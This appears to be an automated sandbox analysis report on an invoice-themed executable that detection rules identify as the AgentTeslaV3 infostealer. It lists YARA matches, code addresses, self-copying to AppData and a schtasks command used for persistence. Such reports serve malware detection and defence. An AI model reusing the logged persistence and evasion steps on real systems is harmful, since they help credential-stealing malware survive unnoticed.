                    Source: 7.0.Overdue invoice.exe.400000.10.unpack, u003cPrivateImplementationDetailsu003eu007b343CACBFu002d3C8Au002d4F57u002dA6FEu002d44CB0DE3909Au007d/BD96E5B6u002d862Eu002d4184u002d9A95u002d4B268ED60D89.csLarge array initialization: .cctor: array initializer size 11614
                    Source: 7.0.Overdue invoice.exe.400000.6.unpack, u003cPrivateImplementationDetailsu003eu007b343CACBFu002d3C8Au002d4F57u002dA6FEu002d44CB0DE3909Au007d/BD96E5B6u002d862Eu002d4184u002d9A95u002d4B268ED60D89.csLarge array initialization: .cctor: array initializer size 11614
                    Source: 7.0.Overdue invoice.exe.400000.12.unpack, u003cPrivateImplementationDetailsu003eu007b343CACBFu002d3C8Au002d4F57u002dA6FEu002d44CB0DE3909Au007d/BD96E5B6u002d862Eu002d4184u002d9A95u002d4B268ED60D89.csLarge array initialization: .cctor: array initializer size 11614
                    Source: 7.2.Overdue invoice.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b343CACBFu002d3C8Au002d4F57u002dA6FEu002d44CB0DE3909Au007d/BD96E5B6u002d862Eu002d4184u002d9A95u002d4B268ED60D89.csLarge array initialization: .cctor: array initializer size 11614
                    Source: Overdue invoice.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                    Source: 16.2.yqWDN.exe.3de2e78.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.0.yqWDN.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.0.yqWDN.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 16.2.yqWDN.exe.3de2e78.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.0.Overdue invoice.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.0.Overdue invoice.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 15.2.yqWDN.exe.3e72e78.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.0.Overdue invoice.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.2.yqWDN.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.0.yqWDN.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.2.Overdue invoice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.0.yqWDN.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.0.Overdue invoice.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 19.0.yqWDN.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 15.2.yqWDN.exe.2d1039c.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                    Source: 0.2.Overdue invoice.exe.3ac2e78.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 7.0.Overdue invoice.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 15.2.yqWDN.exe.3e72e78.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 15.2.yqWDN.exe.3d8e3f8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 16.2.yqWDN.exe.3cfe3f8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Overdue invoice.exe.3ac2e78.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Overdue invoice.exe.39de3f8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Overdue invoice.exe.2960384.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_00524DB1
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_00522809
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_005259ED
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_00C2E2D0
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_00C2E2E0
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_00C2BA74
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_027319C0
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_02731058
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_02731048
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_02731740
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_02731730
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_027319B0
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_02731C83
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_02731C88
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_0726D688
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07265530
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07266420
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07264B68
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_0726C268
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07268AB0
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072632F0
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072642C8
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07263751
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07263758
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07264FB9
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07264FC8
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07269625
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07269648
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07268648
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07268658
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07265520
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_0726CD88
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07268468
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07268458
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07266329
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07266369
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07264B58
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072683C8
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_0726424D
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_07268AA1
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072672C8
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072672D8
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_0726E078
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072688E8
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 0_2_072688D8
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 5_2_002F59ED
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 5_2_002F2809
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 5_2_002F4DB1
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_00FE4DB1
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_00FE59ED
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_00FE2809
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_016DF0A0
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_016DF3E8
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_016D6140
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EBB18
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EC878
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064EF830
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064E1FF8
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064E0040
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_064E0006
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C6ACA8
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C66BF0
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C68608
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C644F8
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C61D28
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C63330
                    Source: C:\Users\user\Desktop\Overdue invoice.exeCode function: 7_2_06C641D1
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_008D59ED
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_008D2809
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_008D4DB1
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_02C6E2DB
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_02C6E2E0
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_02C6BA74
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_04CF1938
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_04CF1C00
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_04CF15F0
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_04CF16A9
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_04CF16B8
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_04CF0FC3
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_04CF0FD0
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_04CF192B
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_04CF1BF3
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07364B68
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_0736C268
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07368AB0
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_0736D688
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_073632F0
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_073642C8
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07365530
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07366420
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07366329
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07364F61
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07366369
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07363753
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07363758
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07364B58
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07364FB9
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07364FC8
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07369625
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07368658
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_0736424D
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07369648
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07368648
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07368AA1
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_073672D8
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_073672C9
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07365520
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_0736CD88
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_0736E078
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07368468
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_07368458
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_073688E8
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 15_2_073688D8
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_00832809
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_008359ED
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_00834DB1
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_012CE2E0
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_012CE2D0
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_012CBA74
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07194B68
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0719C268
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0719D688
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07198AB0
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_071942C8
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_071932F0
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07195530
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07196420
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07196329
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07193758
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07194B58
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07193753
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07196369
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07194F61
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07194FB9
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07194FC8
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07199625
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07198658
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07199648
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07198648
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0719424D
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07198AA1
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_071972D8
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_071972C9
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07195520
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0719CD88
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07198458
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_0719E078
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_07198468
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_071988D8
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeCode function: 16_2_071988E8
                    Source: Overdue invoice.exe, 00000000.00000000.250199094.00000000005C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.298261739.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.298765029.000000000294E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBunifu.UI.dll4 vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.298765029.000000000294E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBMTJANdgKFUuCnPQQfLHbkDsZIdwvTWhXel.exe4 vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.300706050.000000000393F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBMTJANdgKFUuCnPQQfLHbkDsZIdwvTWhXel.exe4 vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.299437457.0000000002C16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.304201924.0000000007160000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000000.00000002.302129408.0000000003B92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000005.00000002.290997467.0000000000396000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000007.00000000.295675285.0000000001086000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000007.00000002.521143332.00000000016E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000007.00000002.519470076.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBMTJANdgKFUuCnPQQfLHbkDsZIdwvTWhXel.exe4 vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000007.00000003.316115485.0000000006A0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
                    Source: Overdue invoice.exe, 00000007.00000002.520543885.00000000014F8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Overdue invoice.exe
                    Source: Overdue invoice.exeBinary or memory string: OriginalFilenamecCjl.exeF vs Overdue invoice.exe
                    Source: Overdue invoice.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: dYXeRswtYBrq.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: yqWDN.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Overdue invoice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: dYXeRswtYBrq.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: yqWDN.exe.7.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: Overdue invoice.exeVirustotal: Detection: 60%
                    Source: Overdue invoice.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile read: C:\Users\user\Desktop\Overdue invoice.exeJump to behavior
                    Source: Overdue invoice.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\Overdue invoice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\Overdue invoice.exe "C:\Users\user\Desktop\Overdue invoice.exe"
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmpA306.tmp
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess created: C:\Users\user\Desktop\Overdue invoice.exe {path}
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess created: C:\Users\user\Desktop\Overdue invoice.exe {path}
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe "C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe "C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe"
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmp2055.tmp
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe {path}
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmpA306.tmp
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess created: C:\Users\user\Desktop\Overdue invoice.exe {path}
                    Source: C:\Users\user\Desktop\Overdue invoice.exeProcess created: C:\Users\user\Desktop\Overdue invoice.exe {path}
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmp2055.tmp
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeProcess created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe {path}
                    Source: C:\Users\user\Desktop\Overdue invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                    Source: C:\Users\user\Desktop\Overdue invoice.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Overdue invoice.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile created: C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exeJump to behavior
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile created: C:\Users\user\AppData\Local\Temp\tmpA306.tmpJump to behavior
                    Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@15/8@3/2
                    Source: C:\Users\user\Desktop\Overdue invoice.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: Overdue invoice.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\Overdue invoice.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\Overdue invoice.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5472:120:WilError_01
                    Source: 7.0.Overdue invoice.exe.400000.10.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 7.0.Overdue invoice.exe.400000.10.unpack, A/F1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
